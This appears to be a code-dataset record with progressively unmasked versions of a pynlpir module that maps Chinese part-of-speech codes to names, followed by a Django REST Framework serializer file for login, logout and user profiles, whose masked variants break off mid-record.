('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-4": "<mask token>\nimport logging\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Part of speech mapping constants and functions for NLPIR/ICTCLAS.\n\nThis module is used by :mod:`pynlpir` to format segmented words for output.\n\n\"\"\"\nimport logging\n\n\nlogger = logging.getLogger(\"pynlpir.pos_map\")\n\n#: A dictionary that maps part of speech codes returned by NLPIR to\n#: human-readable names (English and Chinese).\nPOS_MAP = {\n \"n\": (\n \"名词\",\n \"noun\",\n {\n \"nr\": (\n \"人名\",\n \"personal name\",\n {\n \"nr1\": (\"汉语姓氏\", \"Chinese surname\"),\n \"nr2\": (\"汉语名字\", \"Chinese given name\"),\n \"nrj\": (\"日语人名\", \"Japanese personal name\"),\n \"nrf\": (\"音译人名\", \"transcribed personal name\"),\n },\n ),\n \"ns\": (\n \"地名\",\n \"toponym\",\n {\n \"nsf\": (\"音译地名\", \"transcribed toponym\"),\n },\n ),\n \"nt\": (\"机构团体名\", \"organization/group name\"),\n \"nz\": (\"其它专名\", \"other proper noun\"),\n \"nl\": (\"名词性惯用语\", \"noun phrase\"),\n \"ng\": (\"名词性语素\", \"noun morpheme\"),\n },\n ),\n \"t\": (\n \"时间词\",\n \"time word\",\n {\n \"tg\": (\"时间词性语素\", \"time morpheme\"),\n },\n ),\n \"s\": (\"处所词\", \"locative word\"),\n \"f\": (\"方位词\", \"noun of locality\"),\n \"v\": (\n \"动词\",\n \"verb\",\n {\n \"vd\": (\"副动词\", \"auxiliary verb\"),\n \"vn\": (\"名动词\", \"noun-verb\"),\n \"vshi\": ('动词\"是\"', \"verb 是\"),\n \"vyou\": ('动词\"有\"', \"verb 有\"),\n \"vf\": (\"趋向动词\", \"directional verb\"),\n \"vx\": (\"行事动词\", \"performative verb\"),\n \"vi\": (\"不及物动词\", \"intransitive verb\"),\n \"vl\": (\"动词性惯用语\", \"verb phrase\"),\n \"vg\": (\"动词性语素\", \"verb morpheme\"),\n },\n ),\n \"a\": (\n \"形容词\",\n \"adjective\",\n {\n \"ad\": (\"副形词\", \"auxiliary adjective\"),\n \"an\": (\"名形词\", \"noun-adjective\"),\n \"ag\": (\"形容词性语素\", \"adjective morpheme\"),\n \"al\": (\"形容词性惯用语\", \"adjective phrase\"),\n },\n ),\n \"b\": (\n \"区别词\",\n \"distinguishing word\",\n {\n \"bl\": (\"区别词性惯用语\", \"distinguishing phrase\"),\n },\n ),\n \"z\": (\"状态词\", \"status word\"),\n \"r\": (\n \"代词\",\n \"pronoun\",\n {\n \"rr\": (\"人称代词\", \"personal pronoun\"),\n \"rz\": (\n \"指示代词\",\n \"demonstrative pronoun\",\n {\n \"rzt\": (\"时间指示代词\", \"temporal demonstrative pronoun\"),\n \"rzs\": (\"处所指示代词\", \"locative demonstrative pronoun\"),\n \"rzv\": (\"谓词性指示代词\", \"predicate demonstrative pronoun\"),\n },\n ),\n \"ry\": (\n \"疑问代词\",\n \"interrogative pronoun\",\n {\n \"ryt\": (\"时间疑问代词\", \"temporal interrogative pronoun\"),\n \"rys\": (\"处所疑问代词\", \"locative interrogative pronoun\"),\n \"ryv\": (\"谓词性疑问代词\", \"predicate interrogative pronoun\"),\n },\n ),\n \"rg\": (\"代词性语素\", \"pronoun morpheme\"),\n },\n ),\n \"m\": (\n \"数词\",\n \"numeral\",\n {\n \"mq\": (\"数量词\", \"numeral-plus-classifier compound\"),\n \"mg\": (\"干支\", \"zodiac\"),\n },\n ),\n \"q\": (\n \"量词\",\n \"classifier\",\n {\n \"qv\": (\"动量词\", \"verbal classifier\"),\n \"qt\": (\"时量词\", \"temporal classifier\"),\n },\n ),\n \"d\": (\"副词\", \"adverb\"),\n \"p\": (\n \"介词\",\n \"preposition\",\n {\n \"pba\": (\"介词“把”\", \"preposition 把\"),\n \"pbei\": (\"介词“被”\", \"preposition 被\"),\n },\n ),\n \"c\": (\n \"连词\",\n \"conjunction\",\n {\n \"cc\": (\"并列连词\", \"coordinating conjunction\"),\n },\n ),\n \"u\": (\n \"助词\",\n \"particle\",\n {\n \"uzhe\": (\"着\", \"particle 着\"),\n \"ule\": (\"了/喽\", \"particle 了/喽\"),\n \"uguo\": (\"过\", \"particle 过\"),\n \"ude1\": (\"的/底\", \"particle 的/底\"),\n \"ude2\": (\"地\", \"particle 地\"),\n \"ude3\": (\"得\", \"particle 得\"),\n \"usuo\": (\"所\", \"particle 所\"),\n \"udeng\": (\"等/等等/云云\", \"particle 等/等等/云云\"),\n \"uyy\": (\"一样/一般/似的/般\", \"particle 一样/一般/似的/般\"),\n \"udh\": (\"的话\", \"particle 的话\"),\n \"uls\": (\"来讲/来说/而言/说来\", \"particle 来讲/来说/而言/说来\"),\n \"uzhi\": (\"之\", \"particle 之\"),\n \"ulian\": (\"连\", \"particle 连\"),\n },\n ),\n \"e\": (\"叹词\", \"interjection\"),\n \"y\": (\"语气词\", \"modal particle\"),\n \"o\": (\"拟声词\", \"onomatopoeia\"),\n \"h\": (\"前缀\", \"prefix\"),\n \"k\": (\"后缀\", \"suffix\"),\n \"x\": (\n \"字符串\",\n \"string\",\n {\n \"xe\": (\"Email字符串\", \"email address\"),\n \"xs\": (\"微博会话分隔符\", \"hashtag\"),\n \"xm\": (\"表情符合\", \"emoticon\"),\n \"xu\": (\"网址URL\", \"URL\"),\n \"xx\": (\"非语素字\", \"non-morpheme character\"),\n },\n ),\n \"w\": (\n \"标点符号\",\n \"punctuation mark\",\n {\n \"wkz\": (\"左括号\", \"left parenthesis/bracket\"),\n \"wky\": (\"右括号\", \"right parenthesis/bracket\"),\n \"wyz\": (\"左引号\", \"left quotation mark\"),\n \"wyy\": (\"右引号\", \"right quotation mark\"),\n \"wj\": (\"句号\", \"period\"),\n \"ww\": (\"问号\", \"question mark\"),\n \"wt\": (\"叹号\", \"exclamation mark\"),\n \"wd\": (\"逗号\", \"comma\"),\n \"wf\": (\"分号\", \"semicolon\"),\n \"wn\": (\"顿号\", \"enumeration comma\"),\n \"wm\": (\"冒号\", \"colon\"),\n \"ws\": (\"省略号\", \"ellipsis\"),\n \"wp\": (\"破折号\", \"dash\"),\n \"wb\": (\"百分号千分号\", \"percent/per mille sign\"),\n \"wh\": (\"单位符号\", \"unit of measure sign\"),\n },\n ),\n \"g\": (\"复合语\", \"multiword expression\"),\n \"j\": (\"略语\", \"abbreviation\"),\n}\n\n\ndef _get_pos_name(pos_code, names=\"parent\", english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in (\"parent\", \"child\", \"all\", \"raw\"):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or \"\n \"'raw'; not '{0}'\".format(names)\n )\n logger.debug(\n \"Getting {0} POS name for '{1}' formatted as '{2}'.\".format(\n \"English\" if english else \"Chinese\", pos_code, names\n )\n )\n if names == \"raw\":\n return pos_code\n pos_code = pos_code.lower() # Issue #10\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".format(pos_code))\n return None # Issue #20\n pos = (pos_entry[1 if english else 0],)\n if names == \"parent\":\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to \"\n \"look for child name for '{1}'\".format(pos_entry[1], pos_code)\n )\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n\n if names == \"all\":\n # sub_pos can be None sometimes (e.g. for a word '甲')\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = (sub_pos,)\n\n name = pos if names == \"all\" else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name=\"parent\", english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404
from rest_framework import serializers
from tandlr.core.api.serializers import ModelSerializer
from tandlr.users.models import DeviceUser, User, UserSettings
from tandlr.utils.refresh_token import create_token
class LoginSerializer(serializers.Serializer):
email = serializers.EmailField(
required=True
)
password = serializers.CharField(
required=True
)
device_user_token = serializers.CharField(
max_length=250,
allow_blank=True,
required=False
)
device_os = serializers.CharField(
max_length=30,
allow_blank=False
)
def validate(self, data):
"""
Validation email.
"""
try:
user = User.objects.get(email__iexact=data.get('email'))
except User.DoesNotExist:
raise serializers.ValidationError("invalid credentials")
if not user.check_password(data.get('password')):
raise serializers.ValidationError("invalid credentials")
return data
def create(self, validated_data):
# Valitation mail
user = get_object_or_404(User, email=validated_data.get('email'))
device_user_token = validated_data.get('device_user_token')
device_os = validated_data.get('device_os')
if (isinstance(device_user_token, unicode) and
len(device_user_token) == 64 and
(not device_os or device_os == '')):
device_os = 'iOS'
# Save data of the device
device, created = DeviceUser.objects.get_or_create(
user=user,
device_user_token=device_user_token
)
device.device_os = device_os
device.is_active = True
device.save()
return user
class LogoutSerializer(ModelSerializer):
"""
Serializer for log users out.
"""
is_active = serializers.ReadOnlyField()
class Meta:
model = DeviceUser
fields = ['device_user_token', 'device_os', 'is_active']
def validate(self, data):
"""
Validate that the requesting user owns the given device.
"""
request = self.context['request']
data.setdefault('user', request.user)
data.setdefault('device_user_token', None)
if not request.user.is_authenticated():
raise serializers.ValidationError('user is not logged in.')
try:
self.instance = DeviceUser.objects.get(**data)
except DeviceUser.DoesNotExist:
raise serializers.ValidationError('invalid device')
return data
def update(self):
"""
Mark the given device as inactive.
"""
self.instance.is_active = False
self.instance.save()
return self.instance
class UserSettingsSerializer(serializers.ModelSerializer):
class Meta:
model = UserSettings
fields = (
'id',
'session_confirm',
'message',
'session_cancellation',
'location_change',
'session_reminder',
'available',
'push_notifications_enabled'
)
class UserProfileDetailSerializer(serializers.ModelSerializer):
token = serializers.SerializerMethodField()
settings = UserSettingsSerializer()
class Meta:
model = User
fields = (
'id', 'username', 'name', 'last_name',
'second_last_name', 'description', 'photo', 'email',
'phone', 'zip_code', 'birthday', 'gender', 'is_student',
'is_teacher', 'token', 'settings'
)
def get_token(self, obj):
"""
Create token.
"""
return create_token(obj)
class LoginResponseV2Serializer(serializers.ModelSerializer):
"""
Serializer used to return the proper token, when the user was succesfully
logged in.
"""
token = serializers.SerializerMethodField()
class Meta:
model = User
fields = ('token', )
def get_token(self, obj):
"""
Create token.
"""
return create_token(obj)
|
normal
|
{
"blob_id": "01900c1d14a04ee43553c8602a07e0c6ecfabded",
"index": 1803,
"step-1": "<mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n <mask token>\n <mask token>\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n <mask token>\n <mask token>\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-2": "<mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n <mask token>\n <mask token>\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-3": "<mask token>\n\n\nclass LoginSerializer(serializers.Serializer):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError('invalid credentials')\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError('invalid credentials')\n return data\n <mask token>\n\n\nclass LogoutSerializer(ModelSerializer):\n \"\"\"\n Serializer for log users out.\n \"\"\"\n is_active = serializers.ReadOnlyField()\n\n\n class Meta:\n model = DeviceUser\n fields = ['device_user_token', 'device_os', 'is_active']\n\n def validate(self, data):\n \"\"\"\n Validate that the requesting user owns the given device.\n \"\"\"\n request = self.context['request']\n data.setdefault('user', request.user)\n data.setdefault('device_user_token', None)\n if not request.user.is_authenticated():\n raise serializers.ValidationError('user is not logged in.')\n try:\n self.instance = DeviceUser.objects.get(**data)\n except DeviceUser.DoesNotExist:\n raise serializers.ValidationError('invalid device')\n return data\n\n def update(self):\n \"\"\"\n Mark the given device as inactive.\n \"\"\"\n self.instance.is_active = False\n self.instance.save()\n return self.instance\n\n\nclass UserSettingsSerializer(serializers.ModelSerializer):\n\n\n class Meta:\n model = UserSettings\n fields = ('id', 'session_confirm', 'message',\n 'session_cancellation', 'location_change', 'session_reminder',\n 'available', 'push_notifications_enabled')\n\n\nclass UserProfileDetailSerializer(serializers.ModelSerializer):\n token = serializers.SerializerMethodField()\n settings = UserSettingsSerializer()\n\n\n class Meta:\n model = User\n fields = ('id', 'username', 'name', 'last_name', 'second_last_name',\n 'description', 'photo', 'email', 'phone', 'zip_code',\n 'birthday', 'gender', 'is_student', 'is_teacher', 'token',\n 'settings')\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n\n\nclass LoginResponseV2Serializer(serializers.ModelSerializer):\n \"\"\"\n Serializer used to return the proper token, when the user was succesfully\n logged in.\n \"\"\"\n token = serializers.SerializerMethodField()\n\n\n class Meta:\n model = User\n fields = 'token',\n\n def get_token(self, obj):\n \"\"\"\n Create token.\n \"\"\"\n return create_token(obj)\n",
"step-4": "<mask token>\n\n\nclass LoginSerializer(serializers.Serializer):\n email = serializers.EmailField(required=True)\n password = serializers.CharField(required=True)\n device_user_token = serializers.CharField(max_length=250, allow_blank=\n True, required=False)\n device_os = serializers.CharField(max_length=30, allow_blank=False)\n\n def validate(self, data):\n \"\"\"\n Validation email.\n \"\"\"\n try:\n user = User.objects.get(email__iexact=data.get('email'))\n except User.DoesNotExist:\n raise serializers.ValidationError('invalid credentials')\n if not user.check_password(data.get('password')):\n raise serializers.ValidationError('invalid credentials')\n return data\n\n def create(self, validated_data):\n user = get_object_or_404(User, email=validated_data.get('email'))\n device_user_token = validated_data.get('device_user_token')\n device_os = validated_data.get('device_os')\n if isinstance(device_user_token, unicode) and len(device_user_token\n ) == 64 and (not device_os or device_os == 